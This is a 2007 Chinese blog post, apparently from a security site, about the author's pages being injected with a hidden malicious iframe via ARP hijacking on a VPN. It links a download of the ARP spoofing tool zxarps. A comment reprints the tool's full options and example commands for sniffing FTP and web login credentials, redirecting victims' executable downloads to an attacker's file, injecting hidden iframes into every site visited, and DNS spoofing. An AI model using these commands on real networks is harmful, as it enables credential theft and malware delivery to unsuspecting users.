也被ARP玩了一回

郁闷来着,今天也被ARP玩了一回
本来好好的,突然发现www.sebug.net 主页上有马<iframe src='http://xxx.44986.com/bbs/data/xxx.html' height=2 width=0></iframe> 
郁闷,不太可能吧,不敢相信来着
我立马把站点关闭了。
查了半天没有发现什么问题,代码正常啊
咋回事呢,也没有发现机器不正常。

我用另一台机器开看sebug.net是正常的。难道是传说中的ARP会话截持。我是用路由拔号的,内网就两台机器,另一台还没开机呢,也没可能啊。而且我在另一台机器上打开网站也是正常的,没有被截持。我自己的机器打开红狼等很多网站都出现这样的情况,现在确定是被截持了。还是没有找到问题所在。问了几个朋友,无语。

我把所有的东东都关了,什么QQ,MSN……,晕,还是不行,VPN还没有断开,断开试试

VPN一断开,好了,晕,难道是VPN的IP被截持了,再连接上VPN又被截持了。试了几次,一样的情况
是VPN被截持了

有朋友用61.152.91.2这个VPN的,先别用了吧

ARP,牛……

在NEEAO那找到一个ARP的东东,好像可能实现这样的功能
zxarps.rar (10.63 KB, 下载次数:452, 上传时间:2007-02-07 17:59)

关键词: 安全 , 技术

上一篇: Sebug交流论坛开通
下一篇: 进黑名单了

相关文章
访客评论
#1
回复 地址 2007-02-09, 04:58:16
javascript:R=0; x1=.1; y1=.05; x2=.25; y2=.24; x3=1.6; y3=.24; x4=300; y4=200; x5=300; y5=200; DI=document.images; DIL=DI.length; function A(){for(i=0; i-DIL; i++){DIS=DI[ i ].style; DIS.position='absolute'; DIS.left=Math.sin(R*x1+i*x2+x3)*x4+x5; DIS.top=Math.cos(R*y1+i*y2+y3)*y4+y5}R++}setInterval('A()',5); void(0);
#2
回复 ak 2007-03-08, 14:46:22
0. Realtek RTL8139

IP Address. . . . . : 192.168.1.101

Physical Address. . : 00-11-D8-6B-5E-19

Default Gateway . . : 192.168.1.1

1. WAN (PPP/SLIP) Interface

IP Address. . . . . : xx.xx.xx.xx

Physical Address. . : 00-52-00-00-00-00

Default Gateway . . : xx.xx.xx.xx

options:

-idx [index] 网卡索引号

-ip [ip] 欺骗的IP,用'-'指定范围,','隔开

-sethost [ip] 默认是网关,可以指定别的IP

-port [port] 关注的端口,用'-'指定范围,','隔开,没指定默认关注所有端口

-reset 恢复目标机的ARP表

-hostname 探测主机时获取主机名信息

-logfilter [string]设置保存数据的条件,必须+-_做前缀,后跟关键字,

','隔开关键字,多个条件'|'隔开

所有带+前缀的关键字都出现的包则写入文件

带-前缀的关键字出现的包不写入文件

带_前缀的关键字一个符合则写入文件(如有+-条件也要符合)

-save_a [filename] 将捕捉到的数据写入文件 ACSII模式

-save_h [filename] HEX模式

-hacksite [ip] 指定要插入代码的站点域名或IP,

多个可用','隔开,没指定则影响所有站点

-insert [html code]指定要插入html代码

-postfix [string] 关注的后缀名,只关注HTTP/1.1 302

-hackURL [url] 发现关注的后缀名后修改URL到新的URL

-filename [name] 新URL上有效的资源文件名

-hackdns [string] DNS欺骗,只修改UDP的报文,多个可用','隔开

格式: 域名|IP,www.aa.com|222.22.2.2,www.bb.com|1.1.1.1

-Interval [ms] 定时欺骗的时间间隔,默认是3秒

-spoofmode [1|2|3] 将数据骗发到本机,欺骗对象:1为网关,2为目标机,3为两者

-speed [kb] 限制指定的IP或IP段的网络总带宽,单位:KB

example:

嗅探指定的IP段中端口80的数据,并以HEX模式写入文件

zxarps.exe -idx 0 -ip 192.168.0.2-192.168.0.50 -port 80 -save_h sniff.log

FTP嗅探,在21或2121端口中出现USER或PASS的数据包记录到文件

zxarps.exe -idx 0 -ip 192.168.0.2 -port 21,2121 -spoofmode 2 -logfilter "_USER ,_PASS" -save_a sniff.log

HTTP web邮箱登陆或一些论坛登陆的嗅探,根据情况自行改关键字

zxarps.exe -idx 0 -ip 192.168.0.2-192.168.0.50 -port 80 -logfilter "+POST ,+user,+pass" -save_a sniff.log

用|添加嗅探条件,这样FTP和HTTP的一些敏感关键字可以一起嗅探

zxarps.exe -idx 0 -ip 192.168.0.2 -port 80,21 -logfilter "+POST ,+user,+pass|_USER ,_PASS" -save_a sniff.log

如果嗅探到目标下载文件后缀是exe等则更改Location:为http://xx.net/test.exe

zxarps.exe -idx 0 -ip 192.168.0.2-192.168.0.12,192.168.0.20-192.168.0.30 -spoofmode 3 -postfix ".exe,.rar,.zip" -hackurl http://xx.net/ -filename test.exe

指定的IP段中的用户访问到-hacksite中的网址则只显示just for fun

zxarps.exe -idx 0 -ip 192.168.0.2-192.168.0.99 -port 80 -hacksite 222.2.2.2,www.a.com,www.b.com -insert "just for fun<noframes>"

指定的IP段中的用户访问的所有网站都插入一个框架代码

zxarps.exe -idx 0 -ip 192.168.0.2-192.168.0.99 -port 80 -insert "<iframe src='xx' width=0 height=0>"

指定的两个IP的总带宽限制到20KB

zxarps.exe -idx 0 -ip 192.168.0.55,192.168.0.66 -speed 20

DNS欺骗

zxarps.exe -idx 0 -ip 192.168.0.55,192.168.0.66 -hackdns "www.aa.com|222.22.2.2,www.bb.com|1.1.1.1"

zxarps Build 01/17/2007 By LZX.
#3
回复 amxku 2007-07-04, 16:59:20
今天一测试,发现不能在无线环境下使用。
#4
回复 amxku 2007-07-14, 11:09:45
ARP不能对交换机构成影响。ARP欺骗的对象为网络中支持TCP/IP协议的三层及以上设备。ARP欺骗的有效范围的准确表述应该是同一个广播域内。
发表评论

评论内容 (必填):